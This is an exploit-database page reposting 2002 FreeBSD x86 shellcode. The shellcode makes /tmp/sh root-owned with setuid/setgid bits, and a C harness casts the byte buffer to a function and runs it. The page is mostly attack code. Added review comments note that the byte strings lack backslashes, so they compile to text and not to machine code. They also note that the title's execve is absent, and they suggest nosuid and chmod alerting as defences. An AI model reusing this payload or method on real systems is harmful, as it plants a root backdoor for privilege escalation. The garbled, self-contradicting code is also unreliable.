FreeBSD/x86 – chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)


漏洞ID 1054673 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 FreeBSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13276
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * FreeBSD shellcode
 * chown("/tmp/sh", 0, 0); chmod("/tmp/sh", 06755);
 * 44 bytes
 * 
 * Claes M. Nyberg 20020209
 *
 * <[email protected]>, <[email protected]>
 */

/*************************************************************
void
main(void)
{
__asm__("
          xor      %eax, %eax      # eax = 0 
          pushl    %eax            # string ends with NULL 
          pushl    $0x68732f2f     # push 'hs//' (//sh) 
          pushl    $0x706d742f     # push 'pmt/' (/tmp) 
          movl     %esp, %ebx      # ebx = &string[0]  
          push     %eax            # 0 
          push     %eax            # 0 
          push     %ebx            # /tmp/sh 
          push     %eax            # Dummy 
          mov      $0x10, %al      # eax = 16 = chown 
          int      $0x80           # chown(/tmp/sh, 0, 0); 
          xor      %eax, %eax      # eax = 0
          or       $0xded, %ax     # eax = 06755
          pushl    %eax            # 06755 
          push     %ebx            # /tmp/sh 
          pushl    %eax            # dummy 
          xor      %eax, %eax      # eax = 0
          mov      $0xf, %al       # eax = 15 = chmod 
          int      $0x80           # chmod(/tmp/sh, 06755); 
          mov      $0x1, %al       # eax = 1 = exit
		  push     %eax            # exit value = 1
          push     %eax            # Dummy
          int      $0x80           # exit(1);
    ");
}

*************************************************************/

#include <stdio.h>
#include <string.h>

/*
 * Annotated copy of the payload, one instruction per string literal.
 * Going by the per-line annotations the sequence is:
 *   chown("/tmp/sh", 0, 0); chmod("/tmp/sh", 06755); exit(1);
 * No execve is issued, although the page title mentions one.
 * main() uses this copy only as the strlen() argument.
 *
 * NOTE(review): as printed on this page the literals have no backslash in
 * front of each "x", so a C compiler reads them as plain ASCII text and not
 * as the opcode bytes named in the comments; strlen() on this text does not
 * yield the advertised 44.
 *
 * Defender's reading: the end state is a root-owned /tmp/sh carrying the
 * setuid and setgid bits. chown to 0:0 presumably only succeeds when the
 * calling process is already privileged. Mounting /tmp with nosuid and
 * alerting on chmod calls that set setuid/setgid bits on files in
 * world-writable directories both cover this behaviour.
 */
static char freebsd_code[] =
		"x31xc0"              /* xor      %eax, %eax  */
		"x50"                  /* pushl    %eax        */
		"x68x2fx2fx73x68"  /* pushl    $0x68732f2f */
		"x68x2fx74x6dx70"  /* pushl    $0x706d742f */
		"x89xe3"              /* movl     %esp, %ebx  */
		"x50"                  /* pushl    %eax        */
		"x50"                  /* pushl    %eax        */
		"x53"                  /* pushl    %ebx        */
		"x50"                  /* pushl    %eax        */
		"xb0x10"              /* mov      $0x10, %al  */
		"xcdx80"              /* int      $0x80       */
		"x31xc0"              /* xor      %eax, %eax  */
		"x66x0dxedx0d"      /* or       $0xded, %ax */
		"x50"                  /* pushl    %eax        */
		"x53"                  /* push     %ebx        */
		"x50"                  /* pushl    %eax        */
		"x31xc0"              /* xor      %eax, %eax  */
		"xb0x0f"              /* mov      $0xf, %al   */
		"xcdx80"              /* int      $0x80       */
        "xb0x01"              /* mov      $0x1, %al   */
        "x50"                  /* push     %eax        */
        "x50"                  /* push     %eax        */
        "xcdx80";             /* int      $0x80       */

/*
 * Packed copy of the same sequence as freebsd_code, eight values per line
 * without per-instruction comments. This is the buffer that main() casts to
 * a function pointer and calls.
 *
 * NOTE(review): the literals on this page have no backslash before each
 * "x", so they compile to ASCII text rather than to machine code.
 * NOTE(review): a file-scope identifier that begins with an underscore is
 * reserved for the implementation by ISO C.
 */
static char _freebsd_code[] =
        "x31xc0x50x68x2fx2fx73x68"
        "x68x2fx74x6dx70x89xe3x50"
        "x50x53x50xb0x10xcdx80x31"
        "xc0x66x0dxedx0dx50x53x50"
        "x31xc0xb0x0fxcdx80xb0x01"
        "x50x50xcdx80";

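/*
 * Test harness: prints the length of the annotated array and then
 * transfers control to the packed array.
 *
 * The length is taken from freebsd_code while the call goes through
 * _freebsd_code, so the printed figure describes the executed buffer only
 * as long as the two arrays hold the same bytes.
 *
 * Returns 0 if the call through the pointer ever returns.
 */
int
main(void)
{
    /*
     * Converting an object pointer to a function pointer is not defined by
     * ISO C. On systems that keep data pages non-executable, the call
     * below faults instead of running the buffer.
     */
    void (*code)() = (void *)_freebsd_code;

    /*
     * strlen() returns size_t, so %zu is the matching conversion; %d with a
     * size_t argument is undefined behaviour. The line ending is written as
     * a newline escape, which the page's "%dn" had lost.
     */
    printf("strlen code: %zu\n", strlen(freebsd_code));
    code();
    return 0;
}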

// milw0rm.com [2004-09-26]
